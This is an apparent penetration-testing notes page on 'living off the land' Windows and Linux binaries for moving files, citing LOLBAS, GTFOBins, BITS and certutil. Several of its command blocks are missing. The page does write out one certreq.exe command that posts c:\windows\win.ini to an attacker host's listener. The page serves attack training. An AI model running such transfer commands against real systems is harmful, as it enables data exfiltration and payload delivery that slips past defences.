search

Living Off The Land

There are currently two websites that aggregate information on Living off the Land binaries:

Living off the Land binaries can be used to perform functions such as:

  • Download

  • Upload

  • Command Execution

  • File Read

  • File Write

  • Bypasses

hashtag
LOLBAS (Windows)

To search for download and upload functions in LOLBASarrow-up-right we can use /download or /upload.

Example with CertReq.exe:

We need to listen on a port on our attack host for incoming traffic using Netcat and then execute certreq.exe to upload a file.

certreq.exe -Post -config http://192.168.49.128:8000/ c:\windows\win.ini

hashtag
GTFOBins (Linux)

To search for the download and upload function in GTFOBins for Linux Binariesarrow-up-right, we can use +file download or +file upload.

hashtag
Attacker machine

hashtag
Target

Download the file from the attacker with

hashtag
Bitsadmin Download function

The Background Intelligent Transfer Service (BITS)arrow-up-right can be used to download files from HTTP sites and SMB shares. It "intelligently" checks host and network utilization into account to minimize the impact on a user's foreground work.

PowerShell also enables interaction with BITS, enables file downloads and uploads, supports credentials, and can use specified proxy servers.

hashtag
Certutil

Casey Smith (@subTeearrow-up-right) found that Certutil can be used to download arbitrary files. It is available in all Windows versions and has been a popular file transfer technique, serving as a defacto wget for Windows. However, the Antimalware Scan Interface (AMSI) currently detects this as malicious Certutil usage.

PreviousCatching Files over HTTP/S (Nginx)NextEvading Detection

Last updated